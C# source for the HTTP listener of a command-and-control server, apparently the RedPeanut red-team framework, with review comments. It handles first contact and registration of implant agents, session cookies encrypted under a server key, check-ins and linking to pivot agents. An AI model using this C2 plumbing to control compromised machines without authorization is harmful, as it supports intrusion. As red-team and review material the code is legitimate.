/// <summary>
/// Builds an <see cref="AgentInstanceHttp"/> from already-known agent attributes and,
/// when a pivot id is supplied, links the new instance to the agent registered under that id.
/// </summary>
/// <param name="server">Server object handed to the <see cref="AgentInstanceHttp"/> constructor.</param>
/// <param name="agentid">Identifier of the agent being rebuilt.</param>
/// <param name="agentPivotid">Identifier of the pivoting agent; null or empty means no pivot.</param>
/// <param name="serverkey">Server key passed through to the instance.</param>
/// <param name="address">Address passed through to the instance.</param>
/// <param name="port">Port passed through to the instance.</param>
/// <param name="framework">Framework value passed through to the instance.</param>
/// <param name="profileid">Profile id passed through to the instance.</param>
/// <param name="sessionkey">Optional session key bytes; defaults to null.</param>
/// <param name="sessioniv">Optional session IV bytes; defaults to null.</param>
/// <returns>The constructed agent instance.</returns>
private IAgentInstance CreateAgentInstance(C2Server server, string agentid, string agentPivotid, string serverkey, string address, int port, int framework, int profileid, byte[] sessionkey = null, byte[] sessioniv = null)
{
    IAgentInstance rebuilt = new AgentInstanceHttp(server, agentid, serverkey, address, port, framework, profileid, sessionkey, sessioniv);

    // Nothing to link when the agent did not arrive through a pivot.
    if (string.IsNullOrEmpty(agentPivotid))
    {
        return rebuilt;
    }

    // NOTE(review): the pivot is resolved against the global RedPeanutC2.server rather than
    // the 'server' parameter, and the lookup result is assigned without a null check, so an
    // unknown pivot id leaves Pivoter set to whatever GetAgent returns for a miss.
    rebuilt.Pivoter = RedPeanutC2.server.GetAgent(agentPivotid);
    return rebuilt;
}
/// <summary>
/// Handles the first request of a session (no session cookie present): reads the whole body,
/// decrypts the field named by <c>Paramname</c> with the server key, deserializes it into an
/// <c>AgentIdReqMsg</c>, registers a new inbound agent and answers with the agent-id message.
/// </summary>
/// <param name="reader">Reader over the request body.</param>
/// <returns>
/// <c>Ok</c> carrying the agent-id message on success; <c>NotFound</c> (with a
/// <c>Connection: Close</c> header added) when parsing, decryption, deserialization or
/// registration throws.
/// </returns>
private ActionResult StepOne(StreamReader reader)
{
    AgentIdReqMsg idRequest = null;

    // Phase 1: parse, decrypt and deserialize the untrusted body.
    try
    {
        string rawBody = reader.ReadToEnd();
        Dictionary<string, string> fields = GetParsedArgs(rawBody);
        var plaintext = DecryptMessage(RedPeanutC2.server.GetServerKey(), fields.GetValueOrDefault(Paramname));
        idRequest = JsonConvert.DeserializeObject<AgentIdReqMsg>(plaintext);
    }
    catch (Exception)
    {
        // Every failure in this phase collapses into the same 404; the exception detail is dropped.
        Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found");
        Program.GetMenuStack().Peek().RePrintCLI();
        httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
        return NotFound();
    }

    // Phase 2: create and register the agent, then issue the session cookie.
    try
    {
        // address, port and framework are taken from the decrypted request as-is;
        // no validation of those fields is visible in this method.
        IAgentInstance newAgent = new AgentInstanceHttp(
            RedPeanutC2.server,
            RandomString(10, RedPeanutC2.server.GetRandomObject()),
            RedPeanutC2.server.GetServerKey(),
            idRequest.address,
            idRequest.port,
            idRequest.framework,
            Profileid);

        // A request relayed through a pivot carries the pivot's id; link the two agents.
        // The lookup result is assigned without checking that the pivot id is known.
        if (!string.IsNullOrEmpty(idRequest.AgentPivot))
        {
            newAgent.Pivoter = RedPeanutC2.server.GetAgent(idRequest.AgentPivot);
        }

        RedPeanutC2.server.RegisterAgentInbound(newAgent.AgentId, newAgent);

        string reply = CreateMsgAgentId(newAgent, RedPeanutC2.server.GetServerKey(), Profileid, idRequest.framework);

        // The cookie is the agent id encrypted under the server-wide key; it contains no
        // per-session secret. The meaning of the trailing 0 is not visible here
        // (presumably an expiry setting - confirm against SetCookieValue).
        SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), newAgent.AgentId), 0);

        Console.WriteLine("\n[*] Agent {0} connected", newAgent.AgentId);
        Program.GetMenuStack().Peek().RePrintCLI();
        return Ok(reply);
    }
    catch (Exception e)
    {
        // Operation error: same 404 + Connection: Close response as the parsing failure path.
        Console.WriteLine("[x] Operation error {0}", e.Message);
        Program.GetMenuStack().Peek().RePrintCLI();
        httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
        return NotFound();
    }
}
/// <summary>
/// Entry point for POST requests. Dispatches on the <c>sessionid</c> cookie:
/// no cookie goes to <c>StepOne</c>; a cookie that decrypts to an active agent id goes to
/// <c>PostResponse</c>; one that matches an inbound agent goes to <c>CheckIn</c>; one that
/// matches only a database record is rebuilt with <c>CreateAgentInstance</c> and then
/// checked in. Anything else is answered with <c>NotFound</c>.
/// </summary>
/// <returns>
/// The result of the selected handler, or <c>NotFound</c> (with a <c>Connection: Close</c>
/// header added) for an unknown agent id or any exception raised while dispatching.
/// </returns>
public ActionResult<string> Post()
{
    // Step 1: no session cookie yet, so this is an agent-id request.
    if (string.IsNullOrEmpty(GetCookieValue("sessionid")))
    {
        StreamReader firstStepBody = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
        return StepOne(firstStepBody);
    }

    // The request carries a cookie.
    // It must be RC4-encrypted with the server key; no other check is applied to it, so
    // decrypting to a known agent id is the only thing that binds a request to a session.
    // The body must be encrypted with the session's shared key/IV pair.
    try
    {
        string agentId = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));

        // Look the id up in each agent state in turn: active, inbound, then persisted.
        IAgentInstance agent = null;

        if (RedPeanutC2.server.GetAgents().ContainsKey(agentId))
        {
            // Active agent: the body is handled as a regular message.
            StreamReader activeBody = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
            agent = RedPeanutC2.server.GetAgents().GetValueOrDefault(agentId);
            return PostResponse(activeBody, agent);
        }

        if (RedPeanutC2.server.GetInboundAgents().ContainsKey(agentId))
        {
            // Agent still in the inbound queue: the body has to be an AES check-in.
            StreamReader inboundBody = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
            agent = RedPeanutC2.server.GetInboundAgents().GetValueOrDefault(agentId);
            return CheckIn(inboundBody, agent);
        }

        // Orphaned agent: known to the database but not held in memory.
        AgentInstance stored = dbContext.Agents.FirstOrDefault<AgentInstance>(row => row.agentid.Equals(agentId));
        if (stored == null)
        {
            // The agent does not exist: corrupted session or illegitimate request.
            Console.WriteLine("[x] Agent does not exeists corrupted session or request not legitimate");
            Program.GetMenuStack().Peek().RePrintCLI();
            httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
            return NotFound();
        }

        // Rebuild the in-memory instance from the stored record, including its session key and IV.
        agent = CreateAgentInstance(
            RedPeanutC2.server,
            stored.agentid,
            stored.agentPivotid,
            RedPeanutC2.server.GetServerKey(),
            stored.address,
            stored.port,
            stored.framework,
            Profileid,
            stored.sessionkey,
            stored.sessioniv);

        // CreateAgentInstance constructs an AgentInstanceHttp, so the downcast is expected to succeed.
        AgentInstanceHttp restored = (AgentInstanceHttp)agent;
        restored.Cookie = GetCookieValue("sessionid");

        StreamReader restoredBody = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
        return CheckIn(restoredBody, restored);
    }
    catch (Exception e)
    {
        // Operation error: decrypt failures and handler exceptions all end in the same 404.
        Console.WriteLine("[x] Operation error {0}", e.Message);
        Program.GetMenuStack().Peek().RePrintCLI();
        httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
        return NotFound();
    }
}